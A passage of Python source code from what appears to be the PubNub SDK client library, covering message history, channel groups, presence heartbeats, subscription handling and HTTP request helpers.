'sub_key', self.subscribe_key
]
if (channel is not None and len(channel) > 0):
urlcomponents.append('channel')
urlcomponents.append(channel)
data = {'auth': self.auth_key, 'pnsdk': self.pnsdk}
if state is True:
data['state'] = '1'
if uuids is False:
data['disable_uuids'] = '1'
## Get Presence Here Now
return self._request({"urlcomponents": urlcomponents,
'urlparams': data},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
def history(self, channel, count=100, reverse=False,
start=None, end=None, include_token=False, callback=None,
error=None):
"""This method fetches historical messages of a channel.
PubNub Storage/Playback Service provides real-time access to an
unlimited history for all messages published to PubNub. Stored
messages are replicated across multiple availability zones in several
geographical data center locations. Stored messages can be encrypted
with AES-256 message encryption ensuring that they are not readable
while stored on PubNub's network.
It is possible to control how messages are returned and in what order,
for example you can:
Return messages in the order newest to oldest (default behavior).
Return messages in the order oldest to newest by setting reverse
to true.
Page through results by providing a start or end time token.
Retrieve a "slice" of the time line by providing both a start
and end time token.
Limit the number of messages to a specific quantity using
the count parameter.
Args:
channel: (string)
Specifies channel to return history messages from
count: (int) (default: 100)
Specifies the number of historical messages to return
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
An error method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Returns a list in sync mode i.e. when callback argument is not
given
Sample Response:
[["Pub1","Pub2","Pub3","Pub4","Pub5"],
13406746729185766,13406746845892666]
"""
def _get_decrypted_history(resp):
try:
if (resp is not None and isinstance(resp, (list)) and
resp[1] is not None and self.cipher_key):
msgs = resp[0]
for i in range(0, len(msgs)):
msgs[i] = self.decrypt(msgs[i])
except KeyError:
pass
return resp
def _history_callback(resp):
if callback is not None:
callback(_get_decrypted_history(resp))
if callback is None:
history_cb = None
else:
history_cb = _history_callback
params = dict()
params['count'] = count
params['reverse'] = reverse
params['start'] = start
params['end'] = end
params['auth'] = self.auth_key
params['pnsdk'] = self.pnsdk
params['include_token'] = 'true' if include_token else 'false'
## Get History
return _get_decrypted_history(self._request({'urlcomponents': [
'v2',
'history',
'sub-key',
self.subscribe_key,
'channel',
channel,
], 'urlparams': params},
callback=self._return_wrapped_callback(history_cb),
error=self._return_wrapped_callback(error)))
def time(self, callback=None):
"""This function will return a 17 digit precision Unix epoch.
Args:
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Returns a 17 digit number in sync mode i.e. when callback
argument is not given
Sample:
13769501243685161
"""
time = self._request({'urlcomponents': [
'time',
'0'
]}, callback)
if time is not None:
return time[0]
def _encode(self, request):
return [
"".join([' ~`!@#$%^&*()+=[]\\{}|;\':",./<>?'.find(ch) > -1 and
hex(ord(ch)).replace('0x', '%').upper() or
ch for ch in list(bit)
]) for bit in request]
def _encode_param(self, val):
return "".join([' ~`!@#$%^&*()+=[]\\{}|;\':",./<>?'.find(ch) > -1 and
hex(ord(ch)).replace('0x', '%').upper() or
ch for ch in list(val)])
def _encode_pam(self, val):
return val
def getUrl(self, request, encoder_map=None):
if self.u is True and "urlparams" in request:
request['urlparams']['u'] = str(random.randint(1, 100000000000))
## Build URL
url = self.origin + '/' + "/".join([
"".join([' ~`!@#$%^&*()+=[]\\{}|;\':",./<>?'.find(ch) > -1 and
hex(ord(ch)).replace('0x', '%').upper() or
ch for ch in list(bit)
]) for bit in request["urlcomponents"]])
if ("urlparams" in request):
url = url + '?' + "&".join(
[x + "=" + (self._encode_param(str(y))
if encoder_map is None or
x not in encoder_map else encoder_map[x](str(y)))
for x, y in request[
"urlparams"].items() if y is not None and
len(str(y)) > 0])
if self.http_debug is not None:
self.http_debug(url)
return url
def _channel_registry(self, url=None, params=None, callback=None,
error=None):
if (params is None):
params = dict()
urlcomponents = ['v1', 'channel-registration', 'sub-key',
self.subscribe_key]
if (url is not None):
urlcomponents += url
params['auth'] = self.auth_key
params['pnsdk'] = self.pnsdk
## Get History
return self._request({'urlcomponents': urlcomponents,
'urlparams': params},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
def _channel_group(self, channel_group=None, channels=None, cloak=None,
mode='add', callback=None, error=None):
params = dict()
url = []
namespace = None
if (channel_group is not None and len(channel_group) > 0):
ns_ch_a = channel_group.split(':')
if len(ns_ch_a) > 1:
namespace = None if ns_ch_a[0] == '*' else ns_ch_a[0]
channel_group = ns_ch_a[1]
else:
channel_group = ns_ch_a[0]
if (namespace is not None):
url.append('namespace')
url.append(self._encode(namespace))
url.append('channel-group')
if channel_group is not None and channel_group != '*':
url.append(channel_group)
if (channels is not None):
if (type(channels) is list):
channels = ','.join(channels)
params[mode] = channels
#params['cloak'] = 'true' if CLOAK is True else 'false'
else:
if mode == 'remove':
url.append('remove')
return self._channel_registry(url=url, params=params,
callback=callback, error=error)
def channel_group_list_namespaces(self, callback=None, error=None):
"""Get list of namespaces.
You can obtain list of namespaces for the subscribe key associated with
PubNub object using this method.
Args:
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed
to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_list_namespaces method returns a dict which
contains list of namespaces in payload field
{
u'status': 200,
u'payload': {
u'sub_key': u'demo',
u'namespaces': [u'dev', u'foo']
},
u'service': u'channel-registry',
u'error': False
}
Async Mode: None (callback gets the response as parameter)
Response Format:
The callback passed to channel_group_list_namespaces gets the a
dict containing list of namespaces under payload field
{
u'payload': {
u'sub_key': u'demo',
u'namespaces': [u'dev', u'foo']
}
}
namespaces is the list of namespaces for the given subscribe key
"""
url = ['namespace']
return self._channel_registry(url=url, callback=callback, error=error)
def channel_group_remove_namespace(self, namespace, callback=None,
error=None):
"""Remove a namespace.
A namespace can be deleted using this method.
Args:
namespace: (string) namespace to be deleted
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed to
the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_remove_namespace method returns a dict indicating
status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
Async Mode: None ( callback gets the response as parameter )
Response Format:
The callback passed to channel_group_list_namespaces gets the a
dict indicating status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
"""
url = ['namespace', self._encode(namespace), 'remove']
return self._channel_registry(url=url, callback=callback, error=error)
def channel_group_list_groups(self, namespace=None, callback=None,
error=None):
"""Get list of groups.
Using this method, list of groups for the subscribe key associated
with PubNub object, can be obtained. If namespace is provided, groups
within the namespace only are listed
Args:
namespace: (string) (optional) namespace
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed to
the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_list_groups method returns a dict which contains
list of groups in payload field
{
u'status': 200,
u'payload': {"namespace": "dev", "groups": ["abcd"]},
u'service': u'channel-registry',
u'error': False
}
Async Mode: None ( callback gets the response as parameter )
Response Format:
The callback passed to channel_group_list_namespaces gets the a
dict containing list of groups under payload field
{
u'payload': {"namespace": "dev", "groups": ["abcd"]}
}
"""
if (namespace is not None and len(namespace) > 0):
channel_group = namespace + ':*'
else:
channel_group = '*:*'
return self._channel_group(channel_group=channel_group,
callback=callback, error=error)
def channel_group_list_channels(self, channel_group,
callback=None, error=None):
"""Get list of channels for a group.
Using this method, list of channels for a group, can be obtained.
Args:
channel_group: (string) (optional)
Channel Group name. It can also contain namespace.
If namespace is also specified, then the parameter
will be in format namespace:channel_group
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed to the
method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_list_channels method returns a dict which contains
list of channels in payload field
{
u'status': 200,
u'payload': {"channels": ["hi"], "group": "abcd"},
u'service': u'channel-registry',
u'error': False
}
Async Mode: None ( callback gets the response as parameter )
Response Format:
The callback passed to channel_group_list_channels gets the a
dict containing list of channels under payload field
{
u'payload': {"channels": ["hi"], "group": "abcd"}
}
"""
return self._channel_group(channel_group=channel_group,
callback=callback, error=error)
def channel_group_add_channel(self, channel_group, channel,
callback=None, error=None):
"""Add a channel to group.
A channel can be added to group using this method.
Args:
channel_group: (string)
Channel Group name. It can also contain namespace.
If namespace is also specified, then the parameter
will be in format namespace:channel_group
channel: (string)
Can be a channel name, a list of channel names,
or a comma separated list of channel names
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed to
the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_add_channel method returns a dict indicating
status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
Async Mode: None ( callback gets the response as parameter )
Response Format:
The callback passed to channel_group_add_channel gets the a
dict indicating status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
"""
return self._channel_group(channel_group=channel_group,
channels=channel, mode='add',
callback=callback, error=error)
def channel_group_remove_channel(self, channel_group, channel,
callback=None, error=None):
"""Remove channel.
A channel can be removed from a group method.
Args:
channel_group: (string)
Channel Group name. It can also contain namespace.
If namespace is also specified, then the parameter
will be in format namespace:channel_group
channel: (string)
Can be a channel name, a list of channel names,
or a comma separated list of channel names
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed
to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_remove_channel method returns a dict indicating
status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
Async Mode: None ( callback gets the response as parameter )
Response Format:
The callback passed to channel_group_remove_channel gets the
a dict indicating status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
"""
return self._channel_group(channel_group=channel_group,
channels=channel, mode='remove',
callback=callback, error=error)
def channel_group_remove_group(self, channel_group,
callback=None, error=None):
"""Remove channel group.
A channel group can be removed using this method.
Args:
channel_group: (string)
Channel Group name. It can also contain namespace.
If namespace is also specified, then the parameter
will be in format namespace:channel_group
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed
to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: dict
channel_group_remove_group method returns a dict indicating
status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
Async Mode: None ( callback gets the response as parameter )
Response Format:
The callback passed to channel_group_remove_group gets the a
dict indicating status of the request
{
u'status': 200,
u'message': 'OK',
u'service': u'channel-registry',
u'error': False
}
"""
return self._channel_group(channel_group=channel_group,
mode='remove', callback=callback,
error=error)
class EmptyLock():
def __enter__(self):
pass
def __exit__(self, a, b, c):
pass
empty_lock = EmptyLock()
class PubnubCoreAsync(PubnubBase):
def start(self):
pass
def stop(self):
pass
def nop(self):
pass
def __init__(
self,
publish_key,
subscribe_key,
secret_key=None,
cipher_key=None,
auth_key=None,
ssl_on=False,
origin='pubsub.pubnub.com',
uuid=None,
_tt_lock=empty_lock,
_channel_list_lock=empty_lock,
_channel_group_list_lock=empty_lock
):
super(PubnubCoreAsync, self).__init__(
publish_key=publish_key,
subscribe_key=subscribe_key,
secret_key=secret_key,
cipher_key=cipher_key,
auth_key=auth_key,
ssl_on=ssl_on,
origin=origin,
uuid=uuid
)
self.subscriptions = {}
self.subscription_groups = {}
self.timetoken = 0
self.last_timetoken = 0
self.accept_encoding = 'gzip'
self.SUB_RECEIVER = None
self._connect = None
self._tt_lock = _tt_lock
self._channel_list_lock = _channel_list_lock
self._channel_group_list_lock = _channel_group_list_lock
self._connect = lambda: None
self.u = None
self.heartbeat = 0
self.heartbeat_interval = 0
self.heartbeat_running = False
self.heartbeat_stop_flag = False
self.abort_heartbeat = self.nop
self.heartbeat_callback = self.nop
self.heartbeat_error = self.nop
def get_channel_list(self, channels, nopresence=False):
channel = ''
first = True
with self._channel_list_lock:
for ch in channels:
if nopresence is True and ch.find("-pnpres") >= 0:
continue
if not channels[ch]['subscribed']:
continue
if not first:
channel += ','
else:
first = False
channel += ch
return channel
def get_channel_group_list(self, channel_groups, nopresence=False):
channel_group = ''
first = True
with self._channel_group_list_lock:
for ch in channel_groups:
if nopresence is True and ch.find("-pnpres") >= 0:
continue
if not channel_groups[ch]['subscribed']:
continue
if not first:
channel_group += ','
else:
first = False
channel_group += ch
return channel_group
def get_channel_array(self, nopresence=False):
"""Get List of currently subscribed channels
Returns:
Returns a list containing names of channels subscribed
Sample return value:
["a","b","c]
"""
channels = self.subscriptions
channel = []
with self._channel_list_lock:
for ch in channels:
if nopresence is True and ch.find("-pnpres") >= 0:
continue
if not channels[ch]['subscribed']:
continue
channel.append(ch)
return channel
def get_channel_group_array(self, nopresence=False):
"""Get List of currently subscribed channel groups
Returns:
Returns a list containing names of channel groups subscribed
Sample return value:
["a","b","c]
"""
channel_groups = self.subscription_groups
channel_group = []
with self._channel_group_list_lock:
for ch in channel_groups:
if nopresence is True and ch.find("-pnpres") >= 0:
continue
if not channel_groups[ch]['subscribed']:
continue
channel_group.append(ch)
return channel_group
def each(l, func):
if func is None:
return
for i in l:
func(i)
def restart_heartbeat(self):
self.stop_heartbeat()
self.start_heartbeat()
def stop_heartbeat(self):
self.abort_heartbeat()
self.heartbeat_running = False
self.heartbeat_stop_flag = False
def start_heartbeat(self):
if self.heartbeat_running is True:
return
self._presence_heartbeat()
def _presence_heartbeat(self):
if (self.heartbeat_interval is None or self.heartbeat_interval > 500 or
self.heartbeat_interval < 1):
self.heartbeat_stop_flag = True
if (len(self.get_channel_list(self.subscriptions, True)) == 0 and
len(self.get_channel_group_list(self.subscription_groups, True))
== 0):
self.heartbeat_stop_flag = True
if self.heartbeat_stop_flag is True:
self.heartbeat_running = False
self.heartbeat_stop_flag = False
return
def _callback(resp):
if self.heartbeat_callback is not None:
self.heartbeat_callback(resp)
self.abort_heartbeat = self.timeout(
self.heartbeat_interval, self._presence_heartbeat)
def _error(resp):
if self.heartbeat_error is not None:
self.heartbeat_error(resp)
self.abort_heartbeat = self.timeout(
self.heartbeat_interval, self._presence_heartbeat)
self.heartbeat_running = True
self.presence_heartbeat(_callback, _error)
def set_heartbeat(self, heartbeat, callback=None, error=None):
self.heartbeat = heartbeat
self.heartbeat_interval = (self.heartbeat / 2) - 1
if self.heartbeat == 2:
self.heartbeat_interval = 1
self.restart_heartbeat()
with self._tt_lock:
self.last_timetoken = self.timetoken if self.timetoken != 0 \
else self.last_timetoken
self.timetoken = 0
self._connect()
self.heartbeat_callback = callback
self.heartbeat_error = error
def get_heartbeat(self):
return self.heartbeat
def set_heartbeat_interval(self, heartbeat_interval):
self.heartbeat_interval = heartbeat_interval
self.start_heartbeat()
def get_heartbeat_interval(self):
return self.heartbeat_interval
def presence_heartbeat(self, callback=None, error=None):
data = {'auth': self.auth_key, 'pnsdk': self.pnsdk,
'uuid': self.uuid}
st = json.dumps(self.STATE)
if len(st) > 2:
data['state'] = st
channels = self.get_channel_list(self.subscriptions, True)
channel_groups = self.get_channel_group_list(
self.subscription_groups, True)
if channels is None:
channels = ','
if channel_groups is not None and len(channel_groups) > 0:
data['channel-group'] = channel_groups
if self.heartbeat > 0 and self.heartbeat < 320:
data['heartbeat'] = self.heartbeat
## Send Heartbeat
return self._request({"urlcomponents": [
'v2', 'presence', 'sub-key',
self.subscribe_key,
'channel',
channels,
'heartbeat'
], 'urlparams': data},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
def subscribe(self, channels, callback, state=None, error=None,
connect=None, disconnect=None, reconnect=None,
presence=None, sync=False):
"""Subscribe to data on a channel.
This function causes the client to create an open TCP socket to the
PubNub Real-Time Network and begin listening for messages on a
specified channel. To subscribe to a channel the client must send
the appropriate subscribe_key at initialization.
Only works in async mode
Args:
channel: (string/list)
Specifies the channel to subscribe to. It is possible
to specify multiple channels as a comma separated list
or array.
callback: (function)
This callback is called on receiving a message from
the channel.
state: (dict)
State to be set.
error: (function) (optional)
This callback is called on an error event
connect: (function) (optional)
This callback is called on a successful connection to
the PubNub cloud
disconnect: (function) (optional)
This callback is called on client disconnect from the
PubNub cloud
reconnect: (function) (optional)
This callback is called on successfully re-connecting
to the PubNub cloud
Returns:
None
"""
return self._subscribe(
channels=channels, callback=callback, state=state, error=error,
connect=connect, disconnect=disconnect, reconnect=reconnect,
presence=presence)
def subscribe_group(self, channel_groups, callback, error=None,
connect=None, disconnect=None, reconnect=None,
sync=False):
"""Subscribe to data on a channel group.
This function causes the client to create an open TCP socket to the
PubNub Real-Time Network and begin listening for messages on a
specified channel. To subscribe to a channel group the client must
send the appropriate subscribe_key at initialization.
Only works in async mode
Args:
channel_groups: (string/list)
Specifies the channel groups to subscribe to. It is
possible to specify multiple channel groups as a comma
separated list or array.
callback: (function)
This callback is called on receiving a message from
the channel.
error: (function) (optional)
This callback is called on an error event
connect: (function) (optional)
This callback is called on a successful connection to
the PubNub cloud
disconnect: (function) (optional)
This callback is called on client disconnect from the
PubNub cloud
reconnect: (function) (optional)
This callback is called on successfully re-connecting
to the PubNub cloud
Returns:
None
"""
return self._subscribe(
channel_groups=channel_groups, callback=callback, error=error,
connect=connect, disconnect=disconnect, reconnect=reconnect)
def _subscribe(
self, channels=None, channel_groups=None, state=None, callback=None,
error=None, connect=None, disconnect=None, reconnect=None,
presence=None):
with self._tt_lock:
self.last_timetoken = self.timetoken if self.timetoken != 0 \
else self.last_timetoken
self.timetoken = 0
def _invoke(func, msg=None, channel=None, real_channel=None):
if func is not None:
if (msg is not None and channel is not None and
real_channel is not None):
try:
func(get_data_for_user(msg), channel, real_channel)
except:
func(get_data_for_user(msg), channel)
elif msg is not None and channel is not None:
func(get_data_for_user(msg), channel)
elif msg is not None:
func(get_data_for_user(msg))
else:
func()
def _invoke_connect():
if self._channel_list_lock:
with self._channel_list_lock:
x = copy.copy(self.subscriptions)
for ch in x:
chobj = x[ch]
if chobj['connected'] is False:
chobj['connected'] = True
chobj['disconnected'] = False
_invoke(chobj['connect'], chobj['name'])
else:
if chobj['disconnected'] is True:
chobj['disconnected'] = False
_invoke(chobj['reconnect'], chobj['name'])
if self._channel_group_list_lock:
with self._channel_group_list_lock:
for ch in self.subscription_groups:
chobj = self.subscription_groups[ch]
if chobj['connected'] is False:
chobj['connected'] = True
chobj['disconnected'] = False
_invoke(chobj['connect'], chobj['name'])
else:
if chobj['disconnected'] is True:
chobj['disconnected'] = False
_invoke(chobj['reconnect'], chobj['name'])
def _invoke_disconnect():
if self._channel_list_lock:
with self._channel_list_lock:
for ch in self.subscriptions:
chobj = self.subscriptions[ch]
if chobj['connected'] is True:
if chobj['disconnected'] is False:
chobj['disconnected'] = True
_invoke(chobj['disconnect'], chobj['name'])
if self._channel_group_list_lock:
with self._channel_group_list_lock:
for ch in self.subscription_groups:
chobj = self.subscription_groups[ch]
if chobj['connected'] is True:
if chobj['disconnected'] is False:
chobj['disconnected'] = True
_invoke(chobj['disconnect'], chobj['name'])
def _invoke_error(channel_list=None, error=None):
if channel_list is None:
for ch in self.subscriptions:
chobj = self.subscriptions[ch]
try:
_invoke(chobj['error'], error, ch)
except TypeError:
_invoke(chobj['error'], error)
else:
for ch in channel_list:
chobj = self.subscriptions[ch]
try:
_invoke(chobj['error'], error, ch)
except TypeError:
_invoke(chobj['error'], error)
def _get_channel():
for ch in self.subscriptions:
chobj = self.subscriptions[ch]
if chobj['subscribed'] is True:
return chobj
if channels is not None:
channels = channels if isinstance(
channels, list) else channels.split(",")
for channel in channels:
## New Channel?
if len(channel) > 0 and \
(not channel in self.subscriptions or
self.subscriptions[channel]['subscribed'] is False):
with self._channel_list_lock:
self.subscriptions[channel] = {
'name': channel,
'first': False,
'connected': False,
'disconnected': True,
'subscribed': True,
'callback': callback,
'connect': connect,
'disconnect': disconnect,
'reconnect': reconnect,
'error': error,
'presence': presence
}
if state is not None:
if channel in self.STATE:
self.STATE[channel] = state[channel]
else:
self.STATE[channel] = state
if channel_groups is not None:
channel_groups = channel_groups if isinstance(
channel_groups, list) else channel_groups.split(",")
for channel_group in channel_groups:
## New Channel?
if (len(channel_group) > 0 and
(not channel_group in self.subscription_groups or
self.subscription_groups[channel_group]['subscribed']
is False)):
with self._channel_group_list_lock:
self.subscription_groups[channel_group] = {
'name': channel_group,
'first': False,
'connected': False,
'disconnected': True,
'subscribed': True,
'callback': callback,
'connect': connect,
'disconnect': disconnect,
'reconnect': reconnect,
'error': error,
'presence': presence
}
'''
## return if already connected to channel
if channel in self.subscriptions and \
'connected' in self.subscriptions[channel] and \
self.subscriptions[channel]['connected'] is True:
_invoke(error, "Already Connected")
return
'''
self.restart_heartbeat()
## SUBSCRIPTION RECURSION
def _connect():
self._reset_offline()
def error_callback(response):
## ERROR ?
if not response or \
('message' in response and
response['message'] == 'Forbidden'):
_invoke_error(channel_list=response['payload'][
'channels'], error=response['message'])
self.timeout(1, _connect)
return
if 'message' in response:
_invoke_error(error=response['message'])
else:
_invoke_disconnect()
self.timetoken = 0
self.timeout(1, _connect)
def sub_callback(response):
## ERROR ?
if not response or \
('message' in response and
response['message'] == 'Forbidden'):
_invoke_error(channel_list=response['payload'][
'channels'], error=response['message'])
_connect()
return
_invoke_connect()
with self._tt_lock:
self.timetoken = \
self.last_timetoken if self.timetoken == 0 and \
self.last_timetoken != 0 else response[1]
if len(response) > 3:
channel_list = response[2].split(',')
channel_list_2 = response[3].split(',')
response_list = response[0]
for ch in enumerate(channel_list):
if (ch[1] in self.subscription_groups or
ch[1] in self.subscriptions):
try:
chobj = self.subscription_groups[ch[1]]
except KeyError:
chobj = self.subscriptions[ch[1]]
if ('-pnpres' in channel_list_2[ch[0]]):
cb = chobj['presence']
else:
cb = chobj['callback']
_invoke(cb,
self.decrypt(response_list[ch[0]]),
chobj['name'].split('-pnpres')[0],
channel_list_2[ch[0]].split
('-pnpres')[0])
elif len(response) > 2:
channel_list = response[2].split(',')
response_list = response[0]
for ch in enumerate(channel_list):
if ch[1] in self.subscriptions:
chobj = self.subscriptions[ch[1]]
_invoke(chobj['callback'],
self.decrypt(response_list[ch[0]]),
chobj['name'].split('-pnpres')[0])
else:
response_list = response[0]
chobj = _get_channel()
for r in response_list:
if chobj:
_invoke(chobj['callback'], self.decrypt(r),
chobj['name'].split('-pnpres')[0])
_connect()
channel_list = self.get_channel_list(self.subscriptions)
channel_group_list = self.get_channel_group_list(
self.subscription_groups)
if len(channel_list) <= 0 and len(channel_group_list) <= 0:
return
if len(channel_list) <= 0:
channel_list = ','
data = {"uuid": self.uuid, "auth": self.auth_key,
'pnsdk': self.pnsdk, 'channel-group': channel_group_list}
st = json.dumps(self.STATE)
if len(st) > 2:
data['state'] = quote(st, safe="")
if self.heartbeat > 0:
data["heartbeat"] = self.heartbeat
## CONNECT TO PUBNUB SUBSCRIBE SERVERS
#try:
self.SUB_RECEIVER = self._request({"urlcomponents": [
'subscribe',
self.subscribe_key,
channel_list,
'0',
str(self.timetoken)
], "urlparams": data},
sub_callback,
error_callback,
single=True, timeout=320)
'''
except Exception as e:
self.timeout(1, _connect)
return
'''
self._connect = _connect
## BEGIN SUBSCRIPTION (LISTEN FOR MESSAGES)
_connect()
def _reset_offline(self):
if self.SUB_RECEIVER is not None:
self.SUB_RECEIVER()
self.SUB_RECEIVER = None
def CONNECT(self):
self._reset_offline()
self._connect()
def unsubscribe(self, channel):
"""Unsubscribe from channel .
Only works in async mode
Args:
channel: Channel name ( string )
"""
if channel in self.subscriptions is False:
return False
## DISCONNECT
with self._channel_list_lock:
if channel in self.subscriptions:
self.subscriptions[channel]['connected'] = 0
self.subscriptions[channel]['subscribed'] = False
self.subscriptions[channel]['timetoken'] = 0
self.subscriptions[channel]['first'] = False
self.leave_channel(channel=channel)
# remove channel from STATE
self.STATE.pop(channel, None)
self.CONNECT()
def unsubscribe_group(self, channel_group):
"""Unsubscribe from channel group.
Only works in async mode
Args:
channel_group: Channel group name ( string )
"""
if channel_group in self.subscription_groups is False:
return False
## DISCONNECT
with self._channel_group_list_lock:
if channel_group in self.subscription_groups:
self.subscription_groups[channel_group]['connected'] = 0
self.subscription_groups[channel_group]['subscribed'] = False
self.subscription_groups[channel_group]['timetoken'] = 0
self.subscription_groups[channel_group]['first'] = False
self.leave_group(channel_group=channel_group)
self.CONNECT()
class PubnubCore(PubnubCoreAsync):
def __init__(
self,
publish_key,
subscribe_key,
secret_key=None,
cipher_key=None,
auth_key=None,
ssl_on=False,
origin='pubsub.pubnub.com',
uuid=None,
_tt_lock=None,
_channel_list_lock=None,
_channel_group_list_lock=None
):
super(PubnubCore, self).__init__(
publish_key=publish_key,
subscribe_key=subscribe_key,
secret_key=secret_key,
cipher_key=cipher_key,
auth_key=auth_key,
ssl_on=ssl_on,
origin=origin,
uuid=uuid,
_tt_lock=_tt_lock,
_channel_list_lock=_channel_list_lock,
_channel_group_list_lock=_channel_group_list_lock
)
self.subscriptions = {}
self.timetoken = 0
self.accept_encoding = 'gzip'
class Timer:
def __init__(self, timeout, func, daemon=False, *argv):
self.timeout = timeout
self.func = func
self.argv = argv
self.stop = False
self.thread = None
self.daemon = daemon
def cancel(self):
self.stop = True
self.func = None
def run(self):
time.sleep(self.timeout)
if self.func is not None:
if self.argv is None and len(self.argv) == 0:
self.func()
else:
self.func(*(self.argv))
def start(self):
self.thread = threading.Thread(target=self.run)
self.thread.daemon = self.daemon
self.thread.start()
class HTTPClient:
def __init__(self, pubnub, url, urllib_func=None,
callback=None, error=None, id=None, timeout=5):
self.url = url
self.id = id
self.callback = callback
self.error = error
self.stop = False
self._urllib_func = urllib_func
self.timeout = timeout
self.pubnub = pubnub
def cancel(self):
self.stop = True
self.callback = None
self.error = None
def run(self):
def _invoke(func, data):
if func is not None:
func(get_data_for_user(data))
if self._urllib_func is None:
return
resp = self._urllib_func(self.url, timeout=self.timeout)
data = resp[0]
code = resp[1]
if self.stop is True:
return
if self.callback is None:
with self.pubnub.latest_sub_callback_lock:
if self.pubnub.latest_sub_callback['id'] != self.id:
return
else:
if (self.pubnub.latest_sub_callback['callback']
is not None):
self.pubnub.latest_sub_callback['id'] = 0
try:
data = json.loads(data)
except ValueError:
_invoke(self.pubnub.latest_sub_callback['error'],
{'error': 'json decoding error'})
return
if code != 200:
_invoke(self.pubnub.latest_sub_callback[
'error'], data)
else:
_invoke(self.pubnub.latest_sub_callback[
'callback'], data)
else:
try:
data = json.loads(data)
except ValueError:
_invoke(self.error, {'error': 'json decoding error'})
return
if code != 200:
_invoke(self.error, data)
else:
_invoke(self.callback, data)
def _urllib_request_2(url, timeout=5):
try:
resp = urllib2.urlopen(url, timeout=timeout)
except urllib2.HTTPError as http_error:
resp = http_error
except urllib2.URLError as error:
msg = {"message": str(error.reason)}
return (json.dumps(msg), 0)
return (resp.read(), resp.code)
class PubnubHTTPAdapter(HTTPAdapter):
def init_poolmanager(self, *args, **kwargs):
kwargs.setdefault('socket_options', default_socket_options)
super(PubnubHTTPAdapter, self).init_poolmanager(*args, **kwargs)
s = requests.Session()
#s.mount('http://', PubnubHTTPAdapter(max_retries=1))
#s.mount('https://', PubnubHTTPAdapter(max_retries=1))
#s.mount('http://pubsub.pubnub.com', HTTPAdapter(max_retries=1))
#s.mount('https://pubsub.pubnub.com', HTTPAdapter(max_retries=1))
def _requests_request(url, timeout=5):
try:
resp = s.get(url, timeout=timeout)
except requests.exceptions.HTTPError as http_error:
resp = http_error
except requests.exceptions.ConnectionError as error:
msg = str(error)
return (json.dumps(msg), 0)
except requests.exceptions.Timeout as error:
msg = str(error)
return (json.dumps(msg), 0)
return (resp.text, resp.status_code)
def _urllib_request_3(url, timeout=5):
try:
resp = urllib.request.urlopen(url, timeout=timeout)
except (urllib.request.HTTPError, urllib.request.URLError) as http_error:
resp = http_error
r = resp.read().decode("utf-8")
return (r, resp.code)
_urllib_request = None
# Pubnub
class Pubnub(PubnubCore):
def __init__(
self,
publish_key,
subscribe_key,
secret_key=None,
cipher_key=None,
auth_key=None,
ssl_on=False,
origin='pubsub.pubnub.com',
uuid=None,
pooling=True,
daemon=False,
pres_uuid=None,
azure=False
):
super(Pubnub, self).__init__(
publish_key=publish_key,
subscribe_key=subscribe_key,
secret_key=secret_key,
cipher_key=cipher_key,
auth_key=auth_key,
ssl_on=ssl_on,
origin=origin,
uuid=uuid or pres_uuid,
_tt_lock=threading.RLock(),
_channel_list_lock=threading.RLock(),
_channel_group_list_lock=threading.RLock()
)
global _urllib_request
if self.python_version == 2:
_urllib_request = _urllib_request_2
else:
_urllib_request = _urllib_request_3
if pooling is True:
_urllib_request = _requests_request
self.latest_sub_callback_lock = threading.RLock()
self.latest_sub_callback = {'id': None, 'callback': None}
self.pnsdk = 'PubNub-Python' + '/' + self.version
self.daemon = daemon
if azure is False:
s.mount('http://pubsub.pubnub.com', HTTPAdapter(max_retries=1))
s.mount('https://pubsub.pubnub.com', HTTPAdapter(max_retries=1))
else:
s.mount('http://', PubnubHTTPAdapter(max_retries=1))
s.mount('https://', PubnubHTTPAdapter(max_retries=1))
def timeout(self, interval, func1, *argv):
timer = Timer(interval, func1, False, *argv)
timer.start()
return timer.cancel
def _request_async(self, url, callback=None, error=None, single=False,
timeout=5):
global _urllib_request
